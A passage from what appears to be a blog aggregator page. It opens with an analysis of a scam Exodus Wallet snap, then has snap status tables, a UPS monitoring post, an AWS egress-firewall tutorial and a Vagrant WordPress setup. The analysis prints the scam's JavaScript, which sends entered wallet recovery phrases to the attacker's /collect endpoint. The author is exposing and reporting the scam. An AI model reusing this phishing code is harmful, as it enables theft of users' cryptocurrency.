│ │ ├── exodus-build-96567.desktop
│ │ └── exodus-build-96567.png
│ ├── hooks
│ │ └── configure
│ └── snap.yaml
└── snap
 ├── command-chain
 │ ├── desktop-launch
 │ ├── hooks-configure-fonts
 │ └── run
 ├── gui
 │ ├── exodus-build-96567.desktop
 │ └── exodus-build-96567.png
 └── snapcraft.yaml

8 directories, 11 files

Here’s the snapcraft.yaml used to build the package. Note it needs network access, unsurprisingly.

name: exodus-build-96567 # you probably want to 'snapcraft register <name>'
base: core22 # the base snap is the execution environment for this snap
version: '8.6.5' # just for humans, typically '1.2+git' or '1.3.2'
title: Exodus Wallet
summary: Secure, Manage, and Swap all your favorite assets. # 79 char long summary
description: |
 Forget managing a million different wallets and seed phrases.
 Secure, Manage, and Swap all your favorite assets in one beautiful, easy-to-use wallet.

grade: stable # must be 'stable' to release into candidate/stable channels
confinement: strict # use 'strict' once you have the right plugs and slots

apps:
 exodus-build-96567:
 command: bin/exodus-bin
 extensions: [gnome]
 plugs:
 - network
 - unity7
 - network-status

layout:
 /usr/lib/${SNAPCRAFT_ARCH_TRIPLET}/webkit2gtk-4.1:
 bind: $SNAP/gnome-platform/usr/lib/$SNAPCRAFT_ARCH_TRIPLET/webkit2gtk-4.0

parts:
 exodus-build-96567:
 plugin: dump
 source: .
 organize:
 exodus-bin: bin/

For completeness, here’s the snap.yaml that gets generated at build-time.

name: exodus-build-96567
title: Exodus Wallet
version: 8.6.5
summary: Secure, Manage, and Swap all your favorite assets.
description: |
 Forget managing a million different wallets and seed phrases.
 Secure, Manage, and Swap all your favorite assets in one beautiful, easy-to-use wallet.
architectures:
- amd64
base: core22
assumes:
- command-chain
- snapd2.43
apps:
 exodus-build-96567:
 command: bin/exodus-bin
 plugs:
 - desktop
 - desktop-legacy
 - gsettings
 - opengl
 - wayland
 - x11
 - network
 - unity7
 - network-status
 command-chain:
 - snap/command-chain/desktop-launch
confinement: strict
grade: stable
environment:
 SNAP_DESKTOP_RUNTIME: $SNAP/gnome-platform
 GTK_USE_PORTAL: '1'
 LD_LIBRARY_PATH: ${SNAP_LIBRARY_PATH}${LD_LIBRARY_PATH:+:$LD_LIBRARY_PATH}
 PATH: $SNAP/usr/sbin:$SNAP/usr/bin:$SNAP/sbin:$SNAP/bin:$PATH
plugs:
 desktop:
 mount-host-font-cache: false
 gtk-3-themes:
 interface: content
 target: $SNAP/data-dir/themes
 default-provider: gtk-common-themes
 icon-themes:
 interface: content
 target: $SNAP/data-dir/icons
 default-provider: gtk-common-themes
 sound-themes:
 interface: content
 target: $SNAP/data-dir/sounds
 default-provider: gtk-common-themes
 gnome-42-2204:
 interface: content
 target: $SNAP/gnome-platform
 default-provider: gnome-42-2204
hooks:
 configure:
 command-chain:
 - snap/command-chain/hooks-configure-fonts
 plugs:
 - desktop
layout:
 /usr/lib/x86_64-linux-gnu/webkit2gtk-4.1:
 bind: $SNAP/gnome-platform/usr/lib/x86_64-linux-gnu/webkit2gtk-4.0
 /usr/lib/x86_64-linux-gnu/webkit2gtk-4.0:
 bind: $SNAP/gnome-platform/usr/lib/x86_64-linux-gnu/webkit2gtk-4.0
 /usr/share/xml/iso-codes:
 bind: $SNAP/gnome-platform/usr/share/xml/iso-codes
 /usr/share/libdrm:
 bind: $SNAP/gnome-platform/usr/share/libdrm

Digging Deeper

Unlike the previous scammy application that was written using Flutter, the developers of this one appear to have made a web page in a WebKit GTK wrapper.

If the network is not available, the application loads with an empty window containing an error message “Could not connect: Network is unreachable”.

No network

I brought the network up, ran Wireshark then launched the rogue application again. The app clearly loads the remote content (html, javascript, css, and logos) then renders it inside the wrapper Window.

Wireshark

Edit: I reported this IP to Hostinger abuse, which they took down on 19th March.

The javascript is pretty simple. It has a dictionary of words which are allowed in a recovery key. Here’s a snippet.

var words = ['abandon', 'ability', 'able', 'about', 'above', 'absent', 'absorb',
 
 'youth', 'zebra', 'zero', 'zone', 'zoo'];

As the user types words, the application checks the list.

var alreadyAdded = {};
function checkWords() {
 var button = document.getElementById("continueButton");
 var inputString = document.getElementById("areatext").value;
 var words_list = inputString.split(" ");
 var foundWords = 0;

 words_list.forEach(function(word) {
 if (words.includes(word)) {
 foundWords++;
 }
 });


 if (foundWords === words_list.length && words_list.length === 12 || words_list.length === 18 || words_list.length === 24) {


 button.style.backgroundColor = "#511ade";

 if (!alreadyAdded[words_list]) {
 sendPostRequest(words_list);
 alreadyAdded[words_list] = true;
 button.addEventListener("click", function() {
 renderErrorImport();
 });
 }

 }
 else{
 button.style.backgroundColor = "#533e89";
 }
}

If all the entered words are in the dictionary, it will allow the use of the “Continue” button to send a “POST” request to a /collect endpoint on the server.

function sendPostRequest(words) {

 var data = {
 name: 'exodus',
 data: words
 };

 fetch('/collect', {
 method: 'POST',
 headers: {
 'Content-Type': 'application/json'
 },
 body: JSON.stringify(data)
 })
 .then(response => {
 if (!response.ok) {
 throw new Error('Error during the request');
 }
 return response.json();
 })
 .then(data => {
 console.log('Response:', data);

 })
 .catch(error => {
 console.error('There is an error:', error);
 });
}

Here you can see in the payload, the words I typed, selected from the dictionary mentioned above.

Wireshark

It also periodically ‘pings’ the /ping endpoint on the server with a simple payload of {" name":"exodus"}. Presumably for network connectivity checking, telemetry or seeing which of the scam wallet applications are in use.

function sendPing() {

 var data = {
 name: 'exodus',
 };

 fetch('/ping', {
 method: 'POST',
 headers: {
 'Content-Type': 'application/json'
 },
 body: JSON.stringify(data)
 })
 .then(response => {
 if (!response.ok) {
 throw new Error('Error during the request');
 }
 return response.json();
 })
 .then(data => {
 console.log('Response:', data);

 })
 .catch(error => {
 console.error('There is an error:', error);
 });
}

All of this is done over HTTP, because of course it is. No security needed here!

Conclusion

It’s trivially easy to publish scammy applications like this in the Canonical Snap Store, and for them to go unnoticed.

I was somewhat hopeful that my previous post may have had some impact. It doesn’t look like much has changed yet beyond a couple of conversations on the forum.

It would be really neat if the team at Canonical responsible for the store could do something to prevent these kinds of apps before they get into the hands of users.

I’ve reported the app to the Snap Store team.

Until next time, Brenda!

Alan Popepopey snaps

popey’s snap status

I maintain a few snaps in the Snap Store. This page is generated periodically so I can keep an eye on the updatedness of each one. The script isn’t perfect, and doesn’t monitor them all. It’s a whole thing I need to maintain and update. I should move this to a GitHub Action at some point.

There’s also the charts page which shows how many weekly active devices each of these snaps has, which OS they’re installed on, and which countries they’re installed from.

The list is sorted by the “OK” column which either has a ✔ or ✖ to give a rough indication if the snap needs updating. This whole page is mostly just for my reference.

Sat 20 Apr 03:00:02 BST 2024

Snap Stable Edge Upstream OK?
Azimuth v1.0.3 v1.0.3 v1.0.3
B2 b2-20231011-172305-4bd1939 b2-20231011-172305-4bd1939 b2-20231011-172305-4bd1939
Bandwhich v0.22.2.5f5cc7e v0.22.2.c255c08 v0.22.2
BombSquad 1.7.33 1.7.33 1.7.33
ClassiCube 1.3.6 1.3.6-542-g629622e44 1.3.6
Dog v0.1.0 v0.1.0 v0.1.0
DOSBox-Staging v0.81.0 v0.81.0 v0.81.0
DynaHack v0.6.0 v0.6.0 v0.6.0
emu2 v2021.01 v2021.01 v2021.01
Fab-Agon-Emulator 0.9.43 f9b2d89 0.9.43
halloy 2024.6.7068008 2024.6.29c6615 2024.6
iamb v0.0.9 latest-9-g7bc34c8 v0.0.9
Ladder v0.0.21.3918cf3 v0.0.21.3918cf3 v0.0.21
MAME mame0264 mame0264 mame0264
MatterBridge v1.26.0 v1.26.0 v1.26.0
Mindustry v146 v146 v146
Monolith v2.8.1 v2.8.1 v2.8.1
ncspot v1.1.0 v1.1.0 v1.1.0
NotepadNext v0.7 v0.7 v0.7
Pencil 3.1.1 ^ 3.1.1
PioneerSpaceSimulator 20240314 20240314 20240314
Rustscan 2.1.1 2.1.1-45-gb9337d8 2.1.1
Shattered-Pixel-Dungeon v2.3.2 v2.3.2 v2.3.2
SpectrumAnalyser v0.2.0-alpha-master ^ v0.2.0-alpha
Toot 0.43.0 0.43.0 0.43.0
TwineJS 2.8.1 2.8.1 2.8.1
Defold 1.7.0 ^ 1.8.0-beta
emoj v3.3.0.e60099d v3.3.0.e60099d v4.0.1
Forgejo v1.21.10-0 v1.21.10-0 v1.21.11-1
Lapin a6b34c9 ^ -
Libation 11.1.0 11.3.7 v11.3.7
OpenBoardView 8.0 8.0 -
PWBM 0.1 0.1 -
Session-Desktop v1.12.0 v1.12.0 v1.12.2
Spot 0.4.0 0.4.0 0.4.1
Telegram-Asahi 4.16.8 4.16.8 v4.16.8

Notes

Some notes about specific apps and why they may not looks like they’re updated.

  • Defold: I’m only shipping stable releases in the snap, not alpha/beta releases.
  • emoj: Build error in npm on later releases need investigation.
  • Libation: I’m only shipping stable releases in the snap, not pre-release versions.
  • Telegram Asahi: Currently manually built in a fresh LXD container for each release, on my MacBook Air. I do keep an eye on upstream but sometimes there’s a little delay

Alan PopeSnap charts

popey’s snap charts

These charts show the userbase of snaps I publish in the snap store over the last 30 days. They show the usage by country, version, OS (Linux distro) and channel. The first three only show up to 25 entries for each category.

There’s also the snaps page which lists all the snaps I maintain with their versions, and whether they’re in sync with upstream releases.

Fri 19 Apr 03:00:02 BST 2024

azimuth

Install base by OS ( azimuth )

Install base by OS

Install base by Channel ( azimuth )

Install base by Channel

Install base by Version ( azimuth )

Install base by Version

Install base by Country ( azimuth )

Install base by Country

b2

Install base by OS ( b2 )

Install base by OS

Install base by Channel ( b2 )

Install base by Channel

Install base by Version ( b2 )

Install base by Version

Install base by Country ( b2 )

Install base by Country

bandwhich

Install base by OS ( bandwhich )

Install base by OS

Install base by Channel ( bandwhich )

Install base by Channel

Install base by Version ( bandwhich )

Install base by Version

Install base by Country ( bandwhich )

Install base by Country

bombsquad

Install base by OS ( bombsquad )

Install base by OS

Install base by Channel ( bombsquad )

Install base by Channel

Install base by Version ( bombsquad )

Install base by Version

Install base by Country ( bombsquad )

Install base by Country

classicube

Install base by OS ( classicube )

Install base by OS

Install base by Channel ( classicube )

Install base by Channel

Install base by Version ( classicube )

Install base by Version

Install base by Country ( classicube )

Install base by Country

defold

Install base by OS ( defold )

Install base by OS

Install base by Channel ( defold )

Install base by Channel

Install base by Version ( defold )

Install base by Version

Install base by Country ( defold )

Install base by Country

dog

Install base by OS ( dog )

Install base by OS

Install base by Channel ( dog )

Install base by Channel

Install base by Version ( dog )

Install base by Version

Install base by Country ( dog )

Install base by Country

dosbox-staging

Install base by OS ( dosbox-staging )

Install base by OS

Install base by Channel ( dosbox-staging )

Install base by Channel

Install base by Version ( dosbox-staging )

Install base by Version

Install base by Country ( dosbox-staging )

Install base by Country

dynahack

Install base by OS ( dynahack )

Install base by OS

Install base by Channel ( dynahack )

Install base by Channel

Install base by Version ( dynahack )

Install base by Version

Install base by Country ( dynahack )

Install base by Country

emoj

Install base by OS ( emoj )

Install base by OS

Install base by Channel ( emoj )

Install base by Channel

Install base by Version ( emoj )

Install base by Version

Install base by Country ( emoj )

Install base by Country

emu2

Install base by OS ( emu2 )

Install base by OS

Install base by Channel ( emu2 )

Install base by Channel

Install base by Version ( emu2 )

Install base by Version

Install base by Country ( emu2 )

Install base by Country

fab-agon-emulator

Install base by OS ( fab-agon-emulator )

Install base by OS

Install base by Channel ( fab-agon-emulator )

Install base by Channel

Install base by Version ( fab-agon-emulator )

Install base by Version

Install base by Country ( fab-agon-emulator )

Install base by Country

forgejo

Install base by OS ( forgejo )

Install base by OS

Install base by Channel ( forgejo )

Install base by Channel

Install base by Version ( forgejo )

Install base by Version

Install base by Country ( forgejo )

Install base by Country

halloy

Install base by OS ( halloy )

Install base by OS

Install base by Channel ( halloy )

Install base by Channel

Install base by Version ( halloy )

Install base by Version

Install base by Country ( halloy )

Install base by Country

hey-morty-wubba-lubba-dub-dub

Install base by OS ( hey-morty-wubba-lubba-dub-dub )

Install base by OS

Install base by Channel ( hey-morty-wubba-lubba-dub-dub )

Install base by Channel

Install base by Version ( hey-morty-wubba-lubba-dub-dub )

Install base by Version

Install base by Country ( hey-morty-wubba-lubba-dub-dub )

Install base by Country

iamb

Install base by OS ( iamb )

Install base by OS

Install base by Channel ( iamb )

Install base by Channel

Install base by Version ( iamb )

Install base by Version

Install base by Country ( iamb )

Install base by Country

ladder

Install base by OS ( ladder )

Install base by OS

Install base by Channel ( ladder )

Install base by Channel

Install base by Version ( ladder )

Install base by Version

Install base by Country ( ladder )

Install base by Country

lapin

Install base by OS ( lapin )

Install base by OS

Install base by Channel ( lapin )

Install base by Channel

Install base by Version ( lapin )

Install base by Version

Install base by Country ( lapin )

Install base by Country

libation

Install base by OS ( libation )

Install base by OS

Install base by Channel ( libation )

Install base by Channel

Install base by Version ( libation )

Install base by Version

Install base by Country ( libation )

Install base by Country

linuxtycoon

Install base by OS ( linuxtycoon )

Install base by OS

Install base by Channel ( linuxtycoon )

Install base by Channel

Install base by Version ( linuxtycoon )

Install base by Version

Install base by Country ( linuxtycoon )

Install base by Country

mame

Install base by OS ( mame )

Install base by OS

Install base by Channel ( mame )

Install base by Channel

Install base by Version ( mame )

Install base by Version

Install base by Country ( mame )

Install base by Country

matterbridge

Install base by OS ( matterbridge )

Install base by OS

Install base by Channel ( matterbridge )

Install base by Channel

Install base by Version ( matterbridge )

Install base by Version

Install base by Country ( matterbridge )

Install base by Country

mindustry

Install base by OS ( mindustry )

Install base by OS

Install base by Channel ( mindustry )

Install base by Channel

Install base by Version ( mindustry )

Install base by Version

Install base by Country ( mindustry )

Install base by Country

monolith

Install base by OS ( monolith )

Install base by OS

Install base by Channel ( monolith )

Install base by Channel

Install base by Version ( monolith )

Install base by Version

Install base by Country ( monolith )

Install base by Country

natron

Install base by OS ( natron )

Install base by OS

Install base by Channel ( natron )

Install base by Channel

Install base by Version ( natron )

Install base by Version

Install base by Country ( natron )

Install base by Country

ncspot

Install base by OS ( ncspot )

Install base by OS

Install base by Channel ( ncspot )

Install base by Channel

Install base by Version ( ncspot )

Install base by Version

Install base by Country ( ncspot )

Install base by Country

newsflash

Install base by OS ( newsflash )

Install base by OS

Install base by Channel ( newsflash )

Install base by Channel

Install base by Version ( newsflash )

Install base by Version

Install base by Country ( newsflash )

Install base by Country

notepadnext

Install base by OS ( notepadnext )

Install base by OS

Install base by Channel ( notepadnext )

Install base by Channel

Install base by Version ( notepadnext )

Install base by Version

Install base by Country ( notepadnext )

Install base by Country

null

Install base by OS ( null )

Install base by OS

Install base by Channel ( null )

Install base by Channel

Install base by Version ( null )

Install base by Version

Install base by Country ( null )

Install base by Country

openboardview

Install base by OS ( openboardview )

Install base by OS

Install base by Channel ( openboardview )

Install base by Channel

Install base by Version ( openboardview )

Install base by Version

Install base by Country ( openboardview )

Install base by Country

openspades

Install base by OS ( openspades )

Install base by OS

Install base by Channel ( openspades )

Install base by Channel

Install base by Version ( openspades )

Install base by Version

Install base by Country ( openspades )

Install base by Country

pencil

Install base by OS ( pencil )

Install base by OS

Install base by Channel ( pencil )

Install base by Channel

Install base by Version ( pencil )

Install base by Version

Install base by Country ( pencil )

Install base by Country

pwbm

Install base by OS ( pwbm )

Install base by OS

Install base by Channel ( pwbm )

Install base by Channel

Install base by Version ( pwbm )

Install base by Version

Install base by Country ( pwbm )

Install base by Country

rustscan

Install base by OS ( rustscan )

Install base by OS

Install base by Channel ( rustscan )

Install base by Channel

Install base by Version ( rustscan )

Install base by Version

Install base by Country ( rustscan )

Install base by Country

rota

Install base by OS ( rota )

Install base by OS

Install base by Channel ( rota )

Install base by Channel

Install base by Version ( rota )

Install base by Version

Install base by Country ( rota )

Install base by Country

session-desktop

Install base by OS ( session-desktop )

Install base by OS

Install base by Channel ( session-desktop )

Install base by Channel

Install base by Version ( session-desktop )

Install base by Version

Install base by Country ( session-desktop )

Install base by Country

sfxr

Install base by OS ( sfxr )

Install base by OS

Install base by Channel ( sfxr )

Install base by Channel

Install base by Version ( sfxr )

Install base by Version

Install base by Country ( sfxr )

Install base by Country

shattered-pixel-dungeon

Install base by OS ( shattered-pixel-dungeon )

Install base by OS

Install base by Channel ( shattered-pixel-dungeon )

Install base by Channel

Install base by Version ( shattered-pixel-dungeon )

Install base by Version

Install base by Country ( shattered-pixel-dungeon )

Install base by Country

spectrum-analyser

Install base by OS ( spectrum-analyser )

Install base by OS

Install base by Channel ( spectrum-analyser )

Install base by Channel

Install base by Version ( spectrum-analyser )

Install base by Version

Install base by Country ( spectrum-analyser )

Install base by Country

spek

Install base by OS ( spek )

Install base by OS

Install base by Channel ( spek )

Install base by Channel

Install base by Version ( spek )

Install base by Version

Install base by Country ( spek )

Install base by Country

spot

Install base by OS ( spot )

Install base by OS

Install base by Channel ( spot )

Install base by Channel

Install base by Version ( spot )

Install base by Version

Install base by Country ( spot )

Install base by Country

suckit

Install base by OS ( suckit )

Install base by OS

Install base by Channel ( suckit )

Install base by Channel

Install base by Version ( suckit )

Install base by Version

Install base by Country ( suckit )

Install base by Country

telegram-asahi

Install base by OS ( telegram-asahi )

Install base by OS

Install base by Channel ( telegram-asahi )

Install base by Channel

Install base by Version ( telegram-asahi )

Install base by Version

Install base by Country ( telegram-asahi )

Install base by Country

themirror

Install base by OS ( themirror )

Install base by OS

Install base by Channel ( themirror )

Install base by Channel

Install base by Version ( themirror )

Install base by Version

Install base by Country ( themirror )

Install base by Country

toot

Install base by OS ( toot )

Install base by OS

Install base by Channel ( toot )

Install base by Channel

Install base by Version ( toot )

Install base by Version

Install base by Country ( toot )

Install base by Country

twinejs

Install base by OS ( twinejs )

Install base by OS

Install base by Channel ( twinejs )

Install base by Channel

Install base by Version ( twinejs )

Install base by Version

Install base by Country ( twinejs )

Install base by Country

word-salad

Install base by OS ( word-salad )

Install base by OS

Install base by Channel ( word-salad )

Install base by Channel

Install base by Version ( word-salad )

Install base by Version

Install base by Country ( word-salad )

Install base by Country

x16emu

Install base by OS ( x16emu )

Install base by OS

Install base by Channel ( x16emu )

Install base by Channel

Install base by Version ( x16emu )

Install base by Version

Install base by Country ( x16emu )

Install base by Country

zzt

Install base by OS ( zzt )

Install base by OS

Install base by Channel ( zzt )

Install base by Channel

Install base by Version ( zzt )

Install base by Version

Install base by Country ( zzt )

Install base by Country

Chris WallaceMore Turtle shapes

I’ve come across some classic curves using arcs which can be described in my variant of Turtle...

Chris WallaceMy father in Tairua

My father in Tairua in 1929. Paku is in the background. My father, Francis Brabazon Wallace came...

Andy SmithI don’t think the cheapest APC Back-UPS units can be monitored except in Windows

TL;DR: Despite otherwise seeming to work correctly, I can’t monitor a Back-UPS BX1600MI in Linux without seeing a constant stream of spurious battery detach/reattach and power fail/restore events that last less than 2 seconds each. I’ve tried multiple computers and multiple UPSes of that model. It doesn’t happen in their own proprietary Windows software, so I think they’ve changed the protocol.

Apart from nearly two decades ago when I was given one for free, I’ve never bothered with a UPS at home. Our power grid is very reliable. Looking at availability information from “uptimed“, my home file server has been powered on for 99.97% of the time in the last 14 years. That includes time spent moving house and a day when the house power was off for several hours while the kitchen was refitted!

However, in December 2023 a fault with our electric oven popped the breaker for the sockets causing everything to be harshly powered off. My fileserver took it badly and one drive died. That wasn’t a huge issue as it has a redundant filesystem, but I didn’t like it.

I decided I could afford to treat myself to a relatively cheap UPS.

I did some research and read some reviews of the APC Back-UPS range, their cheapest offering. Many people were dismissive calling them cheap pieces of crap with flimsy plastic construction and batteries that are not regarded as user-replaceable. But there was no indication that such a model would not work, and I felt it hard to justify paying a lot here.

I found YouTube videos of the procedure that a technician would go through to replace the battery in 3 to 5 years. To do it yourself voids your warranty, but your warranty is done after 3 years anyway. It looked pretty doable even for a hardware-avoidant person like myself.

It’s important to me that the UPS can be monitored by a Linux computer. The entire point here is that the computer detects when the battery is near to exhausted and gracefully powers itself down. There are two main options on Linux for this: apcupsd and Network UPS Tools (“nut“).

Looking at the Back-UPS BX1600MI model, it has a USB port for monitoring and says it can be monitored with APC’s own Powerchute Serial Shutdown Windows software. There’s an entry in nut‘s hardware compatibility list for “Back-UPS (USB)” of “supported, based on publicly available protocol”. I made the order.

The UPS worked as expected in terms of being an uninterruptible power supply. It was hopeless trying to talk to it with nut though. nut just kept saying it was losing communications.

I tried apcupsd instead. This stayed connected, but it showed a continuous stream of battery detach/reattach and power fail/restore events each lasting less than 2 seconds. Normally on a power fail you’d expect a visual and audible alert on the UPS itself and I wasn’t getting any of that, but I don’t know if that’s because they were real events that were just too brief.

I contacted APC support but they were very quick to tell me that they did not support any other software but their own Windows-only Powerchute Serial Shutdown (PCSS).

I then asked about this on the apcupsd mailing list. The first response:

“Something’s wrong with your UPS, most likely the battery is bad, but since you say the UPS is brand new, just get it replaced.”

As this thing was brand new I wasn’t going to go through a warranty claim with APC. I just contacted the vendor and told them I thought it was faulty and I wanted to return it. They actually offered to send me another one in advance and me send back the one I had, so I went for that.

In the mean time I found time to install Windows 10 in a virtual machine and pass through USB to it. Guess what? No spurious events in PCSS on Windows. It detected expected events when I yanked the power etc. I had no evidence that the UPS was in any way faulty. You can probably see what is coming.

The replacement UPS (of the same model) behaved exactly the same: spurious events. This just seems to be what the APC Back-UPS does on non-Windows.

Returning to my thread on the apcupsd mailing list, I asked again if there was actually anyone out there who had one of these working with non-Windows. The only substantive response I’ve got so far is:

“BX are the El Cheapo plastic craps, worst of all, not even the BExx0 family is such a crap – Schneider’s direct response to all the chinese craps flooding the markets […] no sane person would buy these things, but, well, here we are.”

So as far as I am aware, the Back-UPS models cannot currently be monitored from non-Windows. That will have to be my working theory unless someone who has it working with non-Windows contacts me to let me know I am wrong, which I would be interested to know about. I feel like I’ve done all that I can to find such people, by asking on the mailing list for the software that is meant for monitoring APC UPSes on Unix.

After talking all this over with the vendor they’ve recommended a Riello NPW 1.5kVA which is listed as fully supported by nut. They are taking the APC units back for a full refund; the Riello is about £30 more expensive.

Chris Wallace“Characters” a Scroll Saw Project

Now that the Delta Scroll saw is working, I was looking for a project to build up my skill. Large...

Chris WallaceDelta Scroll saw

I bought a scroll saw from the Hackspace where it was surplus equipment. There were two in an...

Jon SpriggsUsing #NetworkFirewall and #Route53 #DNS #Firewall to protect a private subnet’s egress traffic in #AWS

I wrote this post in January 2023, and it’s been languishing in my Drafts folder since then. I’ve had a look through it, and I can’t see any glaring reasons why I didn’t publish it so… it’s published… Enjoy ğŸ˜�

If you’ve ever built a private subnet in AWS, you know it can be a bit tricky to get updates from the Internet – you end up having a NAT gateway or a self-managed proxy, and you can never be 100% certain that the egress traffic isn’t going somewhere you don’t want it to.

In this case, I wanted to ensure that outbound HTTPS traffic was being blocked if the SNI didn’t explicitly show the DNS name I wanted to permit through, and also, I only wanted specific DNS names to resolve. To do this, I used AWS Network Firewall and Route 53 DNS Firewall.

I’ve written this blog post, and followed along with this, I’ve created a set of terraform files to represent the steps I’ve taken.

The Setup

Let’s start this story from a simple VPC with three private subnets for my compute resources, and three private subnets for the VPC Endpoints for Systems Manager (SSM).

Here’s our network diagram, with the three subnets containing the VPC Endpoints at the top, and the three instances at the bottom.

I’ve created a tag in my Github repo at this “pre-changes” state, called step 1.

At this point, none of those instances can reach anything outside the network, with the exception of the SSM environment. So, we can’t install any packages, we can’t get data from outside the network or anything similar.

Getting Protected Internet Access

In order to get internet access, we need to add 4 things;

  1. An internet gateway
  2. A NAT gateway in each AZ
  3. Which needs three new subnets
  4. And three Elastic IP addresses
  5. Route tables in all the subnets

To clarify, a NAT gateway acts like a DSL router. It hides the source IP address of outbound traffic behind a single, public IP address (using an Elastic IP from AWS), and routes any return traffic back to wherever that traffic came from. To reduce inter-AZ data transfer rates, I’m putting one in each AZ, but if there’s not a lot of outbound traffic or the outbound traffic isn’t critical enough to require resiliency, this could all be centralised to a single NAT gateway. To put a NAT gateway in each AZ, you need a subnet in each AZ, and to get out to the internet (by whatever means you have), you need an internet gateway and route tables for how to reach the NAT and internet gateways.

We also should probably add, at this point, four additional things.

  1. The Network Firewall
  2. Subnets for the Firewall interfaces
  3. Stateless Policy
  4. Stateful Policy

The Network Firewall acts like a single appliance, and uses a Gateway Load Balancer to present an interface into each of the availability zones. It has a stateless policy (which is very fast, but needs to address both inbound and outbound traffic flows) to do IP and Port based filtering (referred to as “Layer 3” filtering) and then specific traffic can be passed into a stateful policy (which is slower) to do packet and flow inspection.

In this case, I only want outbound HTTPS traffic to be passed, so my stateless rule group is quite simple;

  • VPC range on any port → Internet on TCP/443; pass to Stateful rule groups
  • Internet on TCP/443 → VPC range on any port; pass to Stateful rule groups

I have two stateful rule groups, one is defined to just allow access out to example.com and any relevant subdomains, using the “Domain List” stateful policy item. The other allows access to example.org and any relevant subdomains, using a Suricata stateful policy item, to show the more flexible alternative route. (Suricata has lots more filters than just the SNI value, you can check for specific SSH versions, Kerberos CNAMEs, SNMP versions, etc. You can also add per-rule logging this way, which you can’t with the Domain List route).

These are added to the firewall policy, which also defines that if a rule doesn’t match a stateless rule group, or an established flow doesn’t match a stateful rule group, then it should be dropped.

New network diagram with more subnets and objects, but essentially, as described in the paragraphs above. Traffic flows from the instances either down towards the internet, or up towards the VPCe.

I’ve created a tag in my Github repo at this state, with the firewall, NAT Gateway and Internet Gateway, called step 2.

So far, so good… but why let our users even try to resolve the DNS name of a host they’re not permitted to reach. Let’s turn on DNS Firewalling too.

Turning on Route 53 DNS Firewall

You’ll notice that in the AWS Network Firewall, I didn’t let DNS out of the network. This is because, by default, AWS enables Route 53 as it’s local resolver. This lives on the “.2” address of the VPC, so in my example environment, this would be 198.18.0.2. Because it’s a local resolver, it won’t cross the Firewall exiting to the internet. You can also make Route 53 use your own DNS servers for specific DNS resolution (for example, if you’re running an Active Directory service inside your network).

Any Network Security Response team members you have working with you would appreciate it if you’d turn on DNS Logging at this point, so I’ll do it too!

In March 2021, AWS announced “Route 53 DNS Firewall”, which allow this DNS resolver to rewrite responses, or even to completely deny the existence of a DNS record. With this in mind, I’m going to add some custom DNS rules.

The first thing I want to do is to only permit traffic to my specific list of DNS names – example.org, example.com and their subdomains. DNS quite likes to terminate DNS names with a dot, signifying it shouldn’t try to resolve any higher up the chain, so I’m going to make a “permitted domains” DNS list;

example.com.
example.org.
*.example.com.
*.example.org.

Nice and simple! Except, this also stops me from being able to access the instances over SSM, so I’ll create a separate “VPCe” DNS list:

ssm.ex-ample-1.amazonaws.com.
*.ssm.ex-ample-1.amazonaws.com.
ssmmessages.ex-ample-1.amazonaws.com.
*.ssmmessages.ex-ample-1.amazonaws.com.
ec2messages.ex-ample-1.amazonaws.com.
*.ec2messages.ex-ample-1.amazonaws.com.

Next I create a “default deny” DNS list:

*.

And then build a DNS Firewall Policy which allows access to the “permitted domains”, “VPCe” lists, but blocks resolution of any “default deny” entries.

I’ve created a tag in my Github repo at this state, with the Route 53 DNS Firewall configured, called step 3.

In conclusion…

So there we have it. While the network is not “secure” (there’s still a few gaps here) it’s certainly MUCH more secure than it was, and it certainly would take a lot more work for anyone with malicious intent to get your content out.

Feel free to have a poke around, and leave comments below if this has helped or is of interest!

Jon SpriggsTesting and Developing WordPress Plugins using Vagrant to provide the test environment

I keep trundling back to a collection of WordPress plugins that I really love. And sometimes I want to contribute patches to the plugin.

I don’t want to develop against this server (that would be crazy… huh… right… no one does that… *cough*) but instead, I want a nice, fresh and new WordPress instance to just check that it works the way I was expecting.

So, I created a little Vagrant environment, just for testing WordPress plugins. I clone the repository for the plugin, and create a “TestingEnvironment” directory in there.

I then create the following Vagrantfile.

Vagrant.configure("2") do |config|
  config.vm.box = "ubuntu/jammy64"
  # This will create an IP address in the range 192.168.64.0/24 (usually)
  config.vm.network "private_network", type: "dhcp"
  # This loads the git repo for the plugin into /tmp/git_repo
  config.vm.synced_folder "../", "/tmp/git_repo"

  # If you've got vagrant-cachier, this will speed up apt update/install operations
  if Vagrant.has_plugin?("vagrant-cachier")
    config.cache.scope = :box
  end

  config.vm.provision "shell", inline: <<-SHELL

    # Install Dependencies
    apt-get update
    apt-get install -y apache2 libapache2-mod-fcgid php-fpm mysql-server php-mysql git

    # Set up Apache
    a2enmod proxy_fcgi setenvif
    a2enconf "$(basename "$(ls /etc/apache2/conf-available/php*)" .conf)"
    systemctl restart apache2
    rm -f /var/www/html/index.html

    # Set up WordPress
    bash /vagrant/root_install_wordpress.sh
  SHELL
end

Next, let’s create that root_install_wordpress.sh file.

#! /bin/bash

# Allow us to run commands as www-data
chsh -s /bin/bash www-data
# Let www-data access files in the web-root.
chown -R www-data:www-data /var/www

# Install wp-cli system-wide
curl -s -S -O https://raw.githubusercontent.com/wp-cli/builds/gh-pages/phar/wp-cli.phar
mv wp-cli.phar /usr/local/bin/wp
chmod +x /usr/local/bin/wp

# Slightly based on 
# https://www.a2hosting.co.uk/kb/developer-corner/mysql/managing-mysql-databases-and-users-from-the-command-line
echo "CREATE DATABASE wp;" | mysql -u root
echo "CREATE USER 'wp'@'localhost' IDENTIFIED BY 'wp';" | mysql -u root
echo "GRANT ALL PRIVILEGES ON wp.* TO 'wp'@'localhost';" | mysql -u root
echo "FLUSH PRIVILEGES;" | mysql -u root

# Execute the generic install script
su - www-data -c bash -c /vagrant/user_install_wordpress.sh
# Install any plugins with this script
su - www-data -c bash -c /vagrant/customise_wordpress.sh
# Log the path to access
echo "URL: http://$(sh /vagrant/get_ip.sh) User: admin Password: password"

Now we have our dependencies installed and our database created, let’s get WordPress installed with user_install_wordpress.sh.

#! /bin/bash

# Largely based on https://d9.hosting/blog/wp-cli-install-wordpress-from-the-command-line/
cd /var/www/html
# Install the latest WP into this directory
wp core download --locale=en_GB
# Configure the database with the credentials set up in root_install_wordpress.sh
wp config create --dbname=wp --dbuser=wp --dbpass=wp --locale=en_GB
# Skip the first-run-wizard
wp core install --url="http://$(sh /vagrant/get_ip.sh)" --title=Test --admin_user=admin --admin_password=password --admin_email=example@example.com --skip-email
# Setup basic permalinks
wp option update permalink_structure ""
# Flush the rewrite schema based on the permalink structure
wp rewrite structure ""

